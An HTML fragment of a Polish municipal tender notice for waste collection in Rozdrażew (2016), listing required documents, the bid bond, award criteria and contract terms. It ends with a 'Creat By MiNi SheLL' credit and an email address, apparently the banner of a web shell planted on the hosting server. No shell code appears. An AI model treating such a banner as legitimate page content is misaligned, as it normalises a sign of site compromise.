7)	aktualne zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzające,                       że wykonawca nie zalega z opłacaniem podatków, lub inny dokument potwierdzający,                        że Wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności                   lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;

8)	aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo inny dokument potwierdzający,                                 że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub dokument potwierdzający, że Wykonawca zawarł porozumienie z odpowiednim organem                    w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;


10.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w:
1)	ust. 9 pkt 6)  składa informację z odpowiedniego rejestru albo, w przypadku braku takiego rejestru, inny równoważny dokument wydany przez właściwy organ sądowy                                     lub administracyjny kraju, w którym Wykonawca ma siedzibe lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dotyczy informacja lub dokument, w zakresie określonym w art. 24 ust. 1 pkt 13, 14, 21 ustawy, wystawione nie wczesniej niż 6 miesięcy przed upływem terminu składania ofert;
2)	ust. 9 pkt 7) i 8)  składa dokument lub dokumenty wystawione w kraju w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie zalega                              z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne, albo                     że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz                           z ewentualnymi odsetkami lub grzywnami w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />9.	Wykonawca, którego oferta zostanie najwyżej oceniona na podstawie kryteriów oceny ofert określonych w SIWZ, przed udzieleniem zamówienia na wezwanie Zamawiającego zobowiązany będzie do złożenia w terminie 10 dni następujących aktualnych na dzień złożenia oświadczeń lub dokumentów potwierdzających spełnianie warunków udziału w postępowaniu i braku podstaw                do wykluczenia:
1)	Koncesja, zezwolenie, licencja lub dokument potwierdzający, że Wykonawca jest wpisany               do jednego rejestrów zawodowych lub handlowych prowadzonych w państwie członkowskim Unii Europejskiej, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, zakres ww. dokumentów musi potwierdzać spełnienie warunku określonego w punkcie IX ust. 1 pkt 1a) SIWZ; w przypadku Wykonawców wspólnie ubiegających się o zamówienie dokumenty                  te składa każdy z Wykonawców;
2)	Dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną w punkcie IX ust. 1 pkt 1b) SIWZ, tj. 200.000 zł; w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument ten składa przynajmniej jeden z Wykonawców lub mogą złożyć jeden wspólny dokument potwierdzający, że wszyscy Wykonawcy są ubezpieczeni od odpowiedzialności cywilnej związanej z przedmiotem zamówienia o wartości nie mniejszej niż określona w pkt. IX ust. 1 pkt 1b) SIWZ;
3)	Dokument w postaci informacji banku lub spółdzielczej kasy
oszczędnościowo-kredytowej potwierdzającej  minimalną, określoną w punkcie IX ust. 1 pkt 1b) SIWZ, wysokość posiadanych środków finansowych lub co najmniej taką zdolność kredytową Wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert w postępowaniu o udzielenie zamówienia; w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument ten składa przynajmniej jeden               z Wykonawców lub mogą złożyć odrębne dokumenty potwierdzające, że łącznie wszyscy Wykonawcy dysponują minimalną, określoną w punkcie IX ust. 1 pkt 1b) SIWZ, kwotą                    lub taką zdolnością kredytową;
4)	wykaz wykonanych usług, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, zawierający co najmniej jedną i nie więcej niż pięć usług wymienionych                     w punkcie IX ust. 1 pkt 1c) SIWZ, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia   działalności jest krótszy - w tym okresie, wraz                   z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy      lub usługi zostały wykonane, oraz dowody, określające czy zostały wykonane lub                              są wykonywane należycie; dowodami tymi są:
a)	referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku usług okresowych lub ciągłych, że są wykonywane,                         a w przypadku usług okresowych lub ciągłych powinny być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert,
b)	oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej w punkcie 4a);

Zakres wykazu musi potwierdzać spełnienie odpowiednio warunku określonego w punkcie IX ust. 1 pkt 1c) w zakresie doświadczenia;

W przypadku Wykonawców wspólnie ubiegających się o zamówienie wykaz wraz z dowodami składa przynajmniej jeden w Wykonawców; wzór wykazu znajduje się w załączniku nr 10                 do SIWZ.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Zamawiający wymaga wniesienia wadium

1.	Wykonawca przystępując do przetargu jest obowiązany wnieść wadium w wysokości 15.000,00 zł (słownie: piętnaścietysięcyzłotych 00/100).

2.	Wadium może być wnoszone w jednej lub kilku następujących formach:
a)	pieniądzu, przelewem na rachunek bankowy Zamawiającego wskazany w punkcie                              3 niniejszego rozdziału,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,  z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	 gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy                     z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2014r, poz. 1804, ze zm.).

3.	Wadium w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego:

Urząd Gminy Rozdrażew
Bank Spółdzielczy Dobrzyca O/Rozdrażew
numer konta: 78 8409 000 102 000 2152 0000001

Na poleceniu przelewu należy wpisać: Wadium  Odbiór , transport i zagospodarowanie   odpadów komunalnych z terenu gminy Rozdrażew.

Jeżeli wadium wniesione zostanie w pieniądzu przelewem, Wykonawca dołącza do oferty kserokopię wpłaty wadium z potwierdzeniem dokonanego przelewu.

4. Wadium w pieniądzu musi być wniesione przed upływem terminu do składania ofert, tj. do dnia 7.12.2016 r. do godz. 930

5. W przypadku wnoszenia wadium przelewem na rachunek bankowy, o jego wniesieniu w terminie decydować będzie data wpływu środków na rachunek bankowy Zamawiającego wskazany                       w punkcie 3 niniejszego rozdziału.
6. W przypadku wnoszenia wadium w innych formach niż w pieniądzu, wymagane jest dołączenie oryginału dokumentu wystawionego na rzecz Zamawiającego i złożenie w kasie Urzędu Gminy, najpóźniej w terminie złożenia ofert. Kopię poświadczoną za zgodność z oryginałem  należy załączyć do oferty.

Dokumenty, o których mowa w punkcie 2.b-e. muszą zachować ważność przez cały okres,  w którym Wykonawca jest związany ofertą.

7. Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje odrzucenie oferty Wykonawcy na podstawie art. 89 ust. 1 pkt 7b) ustawy PZP. 

</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60.00</td></tr><tr><td>termin płatności</td><td>40.00</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px">Od wykonawcy, którego oferta zostanie uznana jako najkorzystniejsza wymagane będzie wniesienie przed podpisaniem umowy zabezpieczenia należytego wykonania zobowiązań w wysokości:  5% ceny całkowitej podanej w ofercie albo maksymalnej wartości nominalnej zobowiązania Zamawiającego wynikającego z umowy.   
Zabezpieczenie należytego wykonania umowy wnoszone jest w jednej lub kilku następujących formach:

w pieniądzu: 

sposób przekazania:  
przelewem bankowym na konto Zamawiającego numer konta: 
      BS Dobrzyca o/Rozdrażew nr konta 78 8409 000 102 000 2152 0000001

lub w jednej z poniżej podanych form:   
1) w poręczeniach lub gwarancjach bankowych, 
2) w gwarancjach ubezpieczeniowych,
3) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6 lit. b ust.3 	pkt.4 
	lit. b ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju 
	Przedsiębiorczości (Dz. U. Nr 109, poz.1158 z późniejszymi zmianami),
4)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
	
sposób przekazania: 
dowody wniesienia zabezpieczenia przekazać Zamawiającemu najpóźniej w dniu 
podpisania umowy. Zabezpieczenie należytego wykonania umowy zostanie zwrócona Wykonawcy                w trybie określonym w art. 148 ust. 5, art 151 ust. 1 ustawy PZP
</div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Istotne postanowienia umowy zawarte zostały w projekcie umowy  załącznik nr 7 do SIWZ.

1.	Wszelkie zmiany i uzupełnienia umowy, a także jej ewentualne rozwiązanie albo oświadczenie               o odstąpieniu lub wypowiedzeniu wymagają formy pisemnej pod rygorem nieważności.

2.	Strony dopuszczają zmianę istotnych postanowień umowy zgodnie z wymogami art. 144 ust. 1 pkt 1 ustawy PZP w przypadku wystąpienia następujących okoliczności , których nie można było przewidzieć w chwili zawarcia umowy tj:
zmiany przepisów prawnych istotnych dla realizacji przedmiotu umowy
	wystąpienia urzędowej zmiany stawki podatku VAT zaistniałej po dacie zawarcia umowy
	niezależnych od stron umowy zmian organizacyjnych dotyczących osób kluczowych dla realizacji umowy (w szczególności wypadku losowego, nieprzewidzianej zmiany organizacyjnej).
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 07/12/2016, godzina: 09:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com